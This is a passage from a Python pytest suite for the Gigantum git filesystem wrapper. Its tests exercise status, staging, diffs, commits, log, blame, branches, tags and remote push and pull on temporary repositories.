# Make sure only master content
assert os.path.isfile(os.path.join(scratch_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(scratch_working_dir, 'test2.txt')) is False
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_author_invalid(self, mock_initialized):
"""Test changing the git author info"""
git = mock_initialized[0]
with pytest.raises(ValueError):
git.update_author('Test User')
with pytest.raises(ValueError):
git.update_author('Test User 1', committer='Test User 2')
with pytest.raises(ValueError):
git.update_author('Test User 1', committer=GitAuthor("Author", "a@test.com"))
with pytest.raises(ValueError):
git.update_author(GitAuthor("Author", "a@test.com"), committer="Test User 2")
def test_author(self, mock_initialized):
"""Test changing the git author info"""
git = mock_initialized[0]
# Test defaults
assert type(git.author) == GitAuthor
assert type(git.committer) == GitAuthor
assert git.author.name == "Gigantum AutoCommit"
assert git.author.email == "noreply@gigantum.io"
assert git.committer.name == "Gigantum AutoCommit"
assert git.committer.email == "noreply@gigantum.io"
# Test updating just author
git.update_author(GitAuthor("New Name", "test@test.com"))
assert git.author.name == "New Name"
assert git.author.email == "test@test.com"
assert git.committer.name == "Gigantum AutoCommit"
assert git.committer.email == "noreply@gigantum.io"
# Test updating both
git.update_author(GitAuthor("Author", "a@test.com"), GitAuthor("Committer", "c@test.com"))
assert git.author.name == "Author"
assert git.author.email == "a@test.com"
assert git.committer.name == "Committer"
assert git.committer.email == "c@test.com"
def test_status(self, mock_config):
"""Test getting the status of a repo as it is manipulated"""
# Create a repo in the working dir
create_dummy_repo(mock_config["working_directory"])
# Create a GitFilesystem instance
git = self.get_git_obj(mock_config)
# Create a complex repo with all possible states to check
# Add a normal committed file
write_file(git, "committed.txt", "File number 1\n", commit_msg="initial commit")
# Add a deleted file
write_file(git, "deleted.txt", "File number 2\n", commit_msg="delete file commit")
os.remove(os.path.join(mock_config["working_directory"], "deleted.txt"))
# Add a staged and edited file
write_file(git, "staged_edited.txt", "entry 1", commit_msg="edited initial")
write_file(git, "staged_edited.txt", "entry edited")
# Add a staged file
write_file(git, "staged.txt", "entry staged")
# Add an unstaged edited file
write_file(git, "unstaged_edited.txt", "entry 2")
write_file(git, "unstaged_edited.txt", "entry 2 edited", add=False)
# Add an untracked file
write_file(git, "untracked.txt", "entry untracked", add=False)
# Stage a file in a sub-directory
subdir = os.path.join(mock_config["working_directory"], "subdir")
os.makedirs(subdir)
write_file(git, os.path.join(subdir, "subdir_file.txt"), "entry subdir")
# Check status clean
status = git.status()
assert "staged" in status
assert status["staged"][0] == ('staged.txt', 'added')
assert status["staged"][1] == ('staged_edited.txt', 'modified')
assert status["staged"][2] == ('subdir/subdir_file.txt', 'added')
assert status["staged"][3] == ('unstaged_edited.txt', 'added')
assert "unstaged" in status
assert status["unstaged"][0] == ('deleted.txt', 'deleted')
assert status["unstaged"][1] == ('unstaged_edited.txt', 'modified')
assert "untracked" in status
assert status["untracked"] == ["untracked.txt"]
assert len(status["staged"]) == 4
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 1
def test_add(self, mock_initialized):
"""Test adding a file to a repository"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
print(f"mock_initialized={mock_initialized}")
# Create file
write_file(git, "add.txt", "entry 1", add=False)
# Verify untracked
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["add.txt"]
# Add file
git.add(os.path.join(working_directory, "add.txt"))
# Verify untracked
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("add.txt", 'added')
def test_add_all_working_dir(self, mock_initialized):
"""Test adding all files and changes in the working directory"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
write_file(git, "file1.txt", "dsfgfghfghhsdf", commit_msg="first commit")
write_file(git, "file2.txt", "34356234532453", commit_msg="second commit")
# Create an untracked file, remove a file
write_file(git, "file2.txt", "343562345324535656", add=False)
write_file(git, "file3.txt", "jhgjhgffgdsfgdvdas", add=False)
os.remove(os.path.join(working_directory, "file1.txt"))
# Verify untracked
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 1
assert status["untracked"] == ["file3.txt"]
# Add file
git.add_all()
# Verify untracked
status = git.status()
assert len(status["staged"]) == 3
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("file1.txt", 'deleted')
assert status["staged"][1] == ("file2.txt", 'modified')
assert status["staged"][2] == ("file3.txt", 'added')
def test_add_all_sub_dir(self, mock_initialized):
"""Test adding all files and changes in a sub directory of the working directory"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
os.makedirs(os.path.join(working_directory, "env"))
# Create files
write_file(git, os.path.join("untracked.txt"), "4545", add=False)
write_file(git, os.path.join('env', "file1.txt"), "dsfgfghfghhsdf", commit_msg="first commit")
write_file(git, os.path.join('env', "file2.txt"), "34356234532453", commit_msg="second commit")
# Create an untracked file, remove a file
write_file(git, os.path.join('env', "file2.txt"), "343562345324535656", add=False)
write_file(git, os.path.join('env', "file3.txt"), "jhgjhgffgdsfgdvdas", add=False)
os.remove(os.path.join(working_directory, 'env', "file1.txt"))
# Verify untracked
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 2
assert status["untracked"] == ["env/file3.txt", "untracked.txt"]
# Add file
git.add_all("env")
# Verify untracked
status = git.status()
assert len(status["staged"]) == 3
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["staged"][0] == ("env/file1.txt", 'deleted')
assert status["staged"][1] == ("env/file2.txt", 'modified')
assert status["staged"][2] == ("env/file3.txt", 'added')
def test_remove_staged_file(self, mock_initialized):
"""Test removing files from a repository"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "staged.txt", "entry 1")
# Verify staged
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("staged.txt", 'added')
# Remove
git.remove(os.path.join(working_directory, "staged.txt"))
# Verify removed
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["staged.txt"]
def test_remove_committed_file(self, mock_initialized):
"""Test removing files from a repository"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "staged.txt", "entry 1", commit_msg="Test commit")
# Verify nothing staged
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
# Remove
git.remove(os.path.join(working_directory, "staged.txt"))
# Verify removed
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["staged.txt"]
assert status["staged"][0] == ("staged.txt", "deleted")
def test_remove_committed_file_delete(self, mock_initialized):
"""Test removing file from a repository and delete it"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "staged.txt", "entry 1", commit_msg="Test commit")
# Verify nothing staged
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
# Remove
git.remove(os.path.join(working_directory, "staged.txt"), keep_file=False)
# Verify removed
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("staged.txt", "deleted")
def test_diff_unstaged(self, mock_initialized):
"""Test getting the diff for unstaged changes"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
diff_info = git.diff_unstaged()
assert len(diff_info.keys()) == 2
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
assert "test2.txt" in diff_info
assert len(diff_info["test2.txt"]) == 1
def test_diff_unstaged_file(self, mock_initialized):
"""Test getting the diff of a file that has been changed"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
diff_info = git.diff_unstaged("test.txt")
assert len(diff_info.keys()) == 1
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
def test_diff_staged(self, mock_initialized):
"""Test getting the diff for staged changes"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
diff_info = git.diff_staged()
assert len(diff_info.keys()) == 2
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
assert "test2.txt" in diff_info
assert len(diff_info["test2.txt"]) == 1
def test_diff_staged_file(self, mock_initialized):
"""Test getting the diff of a file that has been changed and staged"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom\n")
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
git.repo.index.commit("commit 1")
# Edit file 1 - Add a line
with open(os.path.join(working_directory, "test.txt"), 'wt') as dt:
dt.write("Line Top Has Changed\n")
for val in range(0, 30):
dt.write("Line {}\n".format(val))
dt.write("Line Bottom Has Changed\n")
# Edit file 2
with open(os.path.join(working_directory, "test2.txt"), 'wt') as dt:
dt.write("File number 2 changed\n")
git.add(os.path.join(working_directory, "test.txt"))
git.add(os.path.join(working_directory, "test2.txt"))
diff_info = git.diff_staged("test.txt")
assert len(diff_info.keys()) == 1
assert "test.txt" in diff_info
assert len(diff_info["test.txt"]) == 2
def test_diff_commits(self, mock_initialized):
"""Test getting the diff between commits in a branch"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
write_file(git, "test1.txt", "File number 1\n")
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 1")
commit1 = git.repo.head.commit
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File number 1 has changed\n", commit_msg="commit 2")
commit2 = git.repo.head.commit
# Edit file 2
write_file(git, "test2.txt", "File number 2 has changed\n", commit_msg="commit 3")
commit3 = git.repo.head.commit
# Create another file
write_file(git, "test3.txt", "File number 3\n", commit_msg="commit 4")
commit4 = git.repo.head.commit
# Diff with defaults (HEAD compared to previous commit)
diff_info = git.diff_commits()
assert len(diff_info.keys()) == 1
assert "test3.txt" in diff_info
assert len(diff_info["test3.txt"]) == 1
# Diff HEAD with first commit
diff_info = git.diff_commits(commit_a=commit1.hexsha)
assert len(diff_info.keys()) == 3
assert "test1.txt" in diff_info
assert "test2.txt" in diff_info
assert "test3.txt" in diff_info
assert len(diff_info["test1.txt"]) == 1
assert len(diff_info["test2.txt"]) == 1
assert len(diff_info["test3.txt"]) == 1
# Diff two middle commits
diff_info = git.diff_commits(commit_a=commit2.hexsha, commit_b=commit3.hexsha)
assert len(diff_info.keys()) == 1
assert "test2.txt" in diff_info
assert len(diff_info["test2.txt"]) == 1
def test_commit(self, mock_initialized):
"""Test making a commit"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create files
write_file(git, "test1.txt", "File number 1\n")
subdir = os.path.join(working_directory, "subdir")
os.makedirs(subdir)
write_file(git, os.path.join(subdir, "subdir_file.txt"), "entry subdir")
write_file(git, "untracked.txt", "Untracked File", add=False)
status = git.status()
assert len(status["staged"]) == 2
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["untracked.txt"]
assert status["staged"][1] == ("test1.txt", "added")
assert status["staged"][0] == (os.path.join("subdir", "subdir_file.txt"), "added")
# Make commit
git.commit("commit 1")
# Verify
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 1
assert status["untracked"] == ["untracked.txt"]
assert git.repo.head.commit.message == "commit 1"
assert git.repo.head.commit.author.name == "Gigantum AutoCommit"
assert git.repo.head.commit.author.email == "noreply@gigantum.io"
def test_commit_with_author(self, mock_initialized):
"""Test making a commit"""
git = mock_initialized[0]
# Create files
write_file(git, "test1.txt", "File number 1\n")
status = git.status()
assert len(status["staged"]) == 1
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert status["staged"][0] == ("test1.txt", "added")
# Make commit
git.commit("commit message test",
author=GitAuthor("Test User 1", "user@gigantum.io"),
committer=GitAuthor("Test User 2", "user2@gigantum.io"))
# Verify
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert git.repo.head.commit.message == "commit message test"
assert git.repo.head.commit.author.name == "Test User 1"
assert git.repo.head.commit.author.email == "user@gigantum.io"
assert git.repo.head.commit.committer.name == "Test User 2"
assert git.repo.head.commit.committer.email == "user2@gigantum.io"
assert git.author.__dict__ == GitAuthor("Test User 1", "user@gigantum.io").__dict__
assert git.committer.__dict__ == GitAuthor("Test User 2", "user2@gigantum.io").__dict__
def test_log(self, mock_initialized):
"""Test getting commit history"""
git = mock_initialized[0]
# Create files
commit_list = []
write_file(git, "test1.txt", "File number 1\n", commit_msg="commit 1")
commit_list.append(git.repo.head.commit)
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 2")
commit_list.append(git.repo.head.commit)
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File 1 has changed\n", commit_msg="commit 3")
commit_list.append(git.repo.head.commit)
# Edit file 2
write_file(git, "test2.txt", "File 2 has changed\n", commit_msg="commit 4")
commit_list.append(git.repo.head.commit)
# Create another file
write_file(git, "test3.txt", "File number 3\n")
git.commit("commit 5", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit_list.append(git.repo.head.commit)
# Get history
log_info = git.log()
assert len(log_info) == 6
# Check, reverse commit_list and drop last commit from log (which was the initial commit in the
# setup fixture). This orders from most recent to least and checks
for truth, log in zip(reversed(commit_list), log_info[:-1]):
assert log["author"] == {"name": truth.author.name, "email": truth.author.email}
assert log["committer"] == {"name": truth.committer.name, "email": truth.committer.email}
assert log["message"] == truth.message
assert log["commit"] == truth.hexsha
# Get history for a single file
log_info = git.log(filename="test2.txt")
assert len(log_info) == 2
log_info[0]["message"] = "commit 4"
log_info[1]["message"] = "commit 2"
def test_log_page(self, mock_initialized):
"""Test getting commit history"""
git = mock_initialized[0]
# Create files
commit_list = []
write_file(git, "test1.txt", "File number 1\n", commit_msg="commit 1")
commit_list.append(git.repo.head.commit)
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 2")
commit_list.append(git.repo.head.commit)
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File 1 has changed\n", commit_msg="commit 3")
commit_start = git.repo.head.commit
commit_list.append(git.repo.head.commit)
# Edit file 2
write_file(git, "test2.txt", "File 2 has changed\n", commit_msg="commit 4")
commit_list.append(git.repo.head.commit)
# Create another file
write_file(git, "test3.txt", "File number 3\n")
git.commit("commit 5", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit_list.append(git.repo.head.commit)
# Get history
log_info = git.log(path_info=commit_start)
assert len(log_info) == 4
assert commit_list[2].hexsha == commit_start.hexsha
assert log_info[0]['commit'] == commit_list[2].hexsha
assert log_info[1]['commit'] == commit_list[1].hexsha
assert log_info[2]['commit'] == commit_list[0].hexsha
# Get history
log_info = git.log(path_info=commit_start, max_count=2)
assert len(log_info) == 2
assert commit_list[2].hexsha == commit_start.hexsha
assert log_info[0]['commit'] == commit_list[2].hexsha
assert log_info[1]['commit'] == commit_list[1].hexsha
def test_log_filter(self, mock_initialized):
"""Test getting commit history with some filtering"""
git = mock_initialized[0]
# Create files
commit_list = []
write_file(git, "test1.txt", "File number 1\n", commit_msg="commit 1")
commit_list.append(git.repo.head.commit)
write_file(git, "test2.txt", "File number 2\n", commit_msg="commit 2")
commit_list.append(git.repo.head.commit)
# Edit file 1 - Add a line
write_file(git, "test1.txt", "File 1 has changed\n", commit_msg="commit 3")
commit_list.append(git.repo.head.commit)
# Edit file 2
write_file(git, "test2.txt", "File 2 has changed\n", commit_msg="commit 4")
commit_list.append(git.repo.head.commit)
# Create another file
write_file(git, "test3.txt", "File number 3\n")
git.commit("commit 5", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit_list.append(git.repo.head.commit)
# Get history, limit to 2
log_info = git.log(max_count=2)
assert len(log_info) == 2
log_info[0]["message"] = "commit 5"
log_info[1]["message"] = "commit 4"
# Get history, limit to 2 and skip 2
log_info = git.log(max_count=2, skip=2)
assert len(log_info) == 2
log_info[0]["message"] = "commit 3"
log_info[1]["message"] = "commit 2"
# Get history, limit to 1 day in the future
log_info = git.log(since=datetime.datetime.now() + datetime.timedelta(days=1))
assert len(log_info) == 0
# Get history, limit to U1 author
log_info = git.log(author="U1")
assert len(log_info) == 1
log_info[0]["message"] = "commit 5"
def test_blame(self, mock_initialized):
"""Test getting blame history for a file"""
git = mock_initialized[0]
working_dir = mock_initialized[1]
# Create files
write_file(git, "test1.txt", "Write 1 by default\nWrite 2 by default\nWrite 3 by default\n", commit_msg="commit 1")
commit1 = git.repo.head.commit
with open(os.path.join(working_dir, "test1.txt"), 'at') as dt:
dt.write("Write 1 by U1\n")
git.add(os.path.join(working_dir, "test1.txt"))
git.commit("commit 2", author=GitAuthor("U1", "test@gigantum.io"),
committer=GitAuthor("U2", "test2@gigantum.io"))
commit2 = git.repo.head.commit
with open(os.path.join(working_dir, "test1.txt"), 'at') as dt:
dt.write("Write 4 by default\nWrite 5 by default\n")
git.add(os.path.join(working_dir, "test1.txt"))
git.commit("commit 3", author=GitAuthor("Gigantum AutoCommit", "noreply@gigantum.io"),
committer=GitAuthor("Gigantum AutoCommit", "noreply@gigantum.io"))
commit3 = git.repo.head.commit
# write second line
with open(os.path.join(working_dir, "test1.txt"), 'wt') as dt:
dt.write("Write 1 by default\nEDIT 2 by default\nWrite 3 by default\nWrite 1 by U1\nWrite 4 by default\nWrite 5 by default\n")
git.add(os.path.join(working_dir, "test1.txt"))
git.commit("commit 4")
commit4 = git.repo.head.commit
blame_info = git.blame("test1.txt")
assert len(blame_info) == 5
assert blame_info[0]["commit"] == commit1.hexsha
assert blame_info[1]["commit"] == commit4.hexsha
assert blame_info[2]["commit"] == commit1.hexsha
assert blame_info[3]["commit"] == commit2.hexsha
assert blame_info[4]["commit"] == commit3.hexsha
assert blame_info[0]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[1]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[2]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[3]["author"]["name"] == "U1"
assert blame_info[4]["author"]["name"] == "Gigantum AutoCommit"
assert blame_info[4]["content"] == "Write 4 by default\nWrite 5 by default"
def test_create_branch(self, mock_initialized):
"""Method to test creating a branch"""
git = mock_initialized[0]
working_dir = mock_initialized[1]
branches = git.repo.heads
assert len(branches) == 1
assert branches[0].name == "master"
git.create_branch("test_branch1")
branches = git.repo.heads
assert len(branches) == 2
assert branches[0].name == "master"
assert branches[1].name == "test_branch1"
def test_rename_branch(self, mock_initialized):
"""Method to test deleting a branch"""
git = mock_initialized[0]
branches = git.repo.heads
assert len(branches) == 1
assert branches[0].name == "master"
git.create_branch("test_branch1")
git.create_branch("test_branch2")
branches = git.repo.heads
assert len(branches) == 3
assert branches[0].name == "master"
assert branches[1].name == "test_branch1"
assert branches[2].name == "test_branch2"
# Rename branch
git.rename_branch("test_branch2", "my_new_branch")
branches = git.repo.heads
assert len(branches) == 3
assert branches[0].name == "master"
assert branches[1].name == "my_new_branch"
assert branches[2].name == "test_branch1"
# Make sure invalid branch names raise an exception
with pytest.raises(ValueError):
git.rename_branch("a;lskjdfas;lkjhdf", "test2")
# Rename checked out branch
git.rename_branch("master", "new_master")
branches = git.repo.heads
assert len(branches) == 3
assert branches[0].name == "my_new_branch"
assert branches[1].name == "new_master"
assert branches[2].name == "test_branch1"
def test_checkout_branch(self, mock_initialized):
"""Method to test checkout a branch"""
git = mock_initialized[0]
assert git.repo.head.ref.name == "master"
git.create_branch("test_branch1")
import pprint
pprint.pprint(git.repo.head.ref.name)
# BVB NOTE!! I changed behavior so "create_branch" also checks out that new branch
#assert git.repo.head.ref.name == "master" # <-- Original behavior
assert git.repo.head.ref.name == "test_branch1" # <-- New behavior following BVB changes
# Checkout branch
git.checkout("test_branch1")
assert git.repo.head.ref.name == "test_branch1"
# Make sure invalid branch names raise an exception
with pytest.raises(ValueError):
git.checkout("a;lskjdfas;lkjhdf")
def test_checkout_branch_context(self, mock_initialized):
"""Method to test checkout context ID file getting removed """
git = mock_initialized[0]
assert git.repo.head.ref.name == "master"
git.create_branch("test_branch1")
assert git.repo.head.ref.name == "test_branch1"
# Write a checkout context file for this test
os.makedirs(os.path.join(git.working_directory, '.gigantum'))
checkout_file = os.path.join(git.working_directory, '.gigantum', '.checkout')
with open(checkout_file, 'wt') as cf:
cf.write("dummy_id")
assert os.path.exists(checkout_file) is True
# Checkout branch
git.checkout("test_branch1")
assert os.path.exists(checkout_file) is False
def test_list_branches(self, mock_initialized_remote):
"""Method to test listing branches"""
git = mock_initialized_remote[0]
git.create_branch("test_remote_branch")
git.publish_branch("test_remote_branch")
git.create_branch("test_local_branch")
branches = git.list_branches()
assert len(branches["local"]) == 3
assert len(branches["remote"]) == 4
assert "test_local_branch" in branches["local"]
assert "test_remote_branch" in branches["local"]
assert "origin/test_local_branch" not in branches["remote"]
assert "origin/test_remote_branch" in branches["remote"]
def test_delete_branch(self, mock_initialized_remote):
"""Method to test deleting branches"""
git = mock_initialized_remote[0]
git.create_branch("test_remote_branch")
git.publish_branch("test_remote_branch")
git.create_branch("test_local_branch")
branches = git.list_branches()
assert len(branches["local"]) == 3
assert len(branches["remote"]) == 4
# Delete local branch
git.checkout("master") # <-- BVB Note, this was added for change in create_branch semantics.
git.delete_branch("test_local_branch")
branches = git.list_branches()
assert len(branches["local"]) == 2
assert len(branches["remote"]) == 4
# Delete remote branch, locally only
git.checkout("master")
git.delete_branch("test_remote_branch")
branches = git.list_branches()
assert len(branches["local"]) == 1
assert branches["local"][0] == "master"
assert len(branches["remote"]) == 4
# Delete remote branch on remote
git.delete_branch("test_remote_branch", delete_remote=True)
branches = git.list_branches()
assert len(branches["local"]) == 1
assert branches["local"][0] == "master"
assert len(branches["remote"]) == 3
def test_existing_tag_fail(self, mock_initialized):
"""Method to test creating an existing tag, should fail"""
git = mock_initialized[0]
git.create_tag("test_tag_1", "test tag 1")
# Should fail on an existing tag
with pytest.raises(GitCommandError):
git.create_tag("test_tag_1", "test tag 1 should fail!")
def test_tags(self, mock_initialized):
"""Method to test creating and listing tags"""
git = mock_initialized[0]
# Test creating a new tag
git.create_tag("tag1", "test tag 1")
write_file(git, "test1.txt", "content", commit_msg="Adding a file")
git.create_tag("tag2", "test tag 2")
tags = git.list_tags()
assert len(tags) == 2
assert tags[0]["name"] == "tag1"
assert tags[0]["message"] == "test tag 1"
assert tags[1]["name"] == "tag2"
assert tags[1]["message"] == "test tag 2"
def test_add_remove_remote(self, mock_initialized_remote):
"""Method to test creating and listing tags"""
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git = get_fs_class()(config)
git.initialize()
remote_dir = mock_initialized_remote[3]
git.add_remote("origin", remote_dir)
remotes = git.list_remotes()
assert len(remotes) == 1
assert remotes[0]["name"] == "origin"
assert remotes[0]["url"] == remote_dir
git.remove_remote("origin")
assert len(git.list_remotes()) == 0
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_publish_branch(self, mock_initialized_remote):
"""Method to test creating and listing tags"""
# Get a clone of the remote repo
git = mock_initialized_remote[0]
branches = git.repo.heads
assert len(branches) == 1
assert branches[0].name == "master"
# Create a branch
git.create_branch("test_branch1")
# Publish the branch
git.publish_branch("test_branch1", "origin")
branches = git.repo.heads
assert len(branches) == 2
assert branches[0].name == "master"
assert branches[1].name == "test_branch1"
# Create a new clone and make sure you got your branches
test_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(test_working_dir)
test_repo = Repo.clone_from(mock_initialized_remote[3], test_working_dir)
assert len(test_repo.remotes["origin"].fetch()) == 3
def test_fetch_pull(self, mock_initialized_remote):
"""Method to fetch, pull from remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
# Make sure only master content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
# check out a branch and pull it
git.checkout("test_branch")
git.pull()
assert len(git.repo.heads) == 2
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is True
# Add a file
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git_updater = get_fs_class()(config)
git_updater.clone(mock_initialized_remote[3])
git_updater.checkout("test_branch")
# Add a file to master and commit
write_file(git_updater, "test3.txt", "adding a new file Content", commit_msg="add commit")
git_updater.repo.remotes.origin.push()
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is False
git.pull()
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_push(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
# Make sure only master content
git.checkout("master")
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
# Add a file to master and commit
write_file(git, "test3.txt", "adding a new file Content", commit_msg="add commit")
git.push()
# Make sure it pushed by cloning again content
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git_updater = get_fs_class()(config)
git_updater.clone(mock_initialized_remote[3])
git_updater.checkout("master")
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_push_tags(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
# Add a file to master and commit
write_file(git, "test3.txt", "adding a new file Content", commit_msg="add commit")
git.push()
# Add a tag
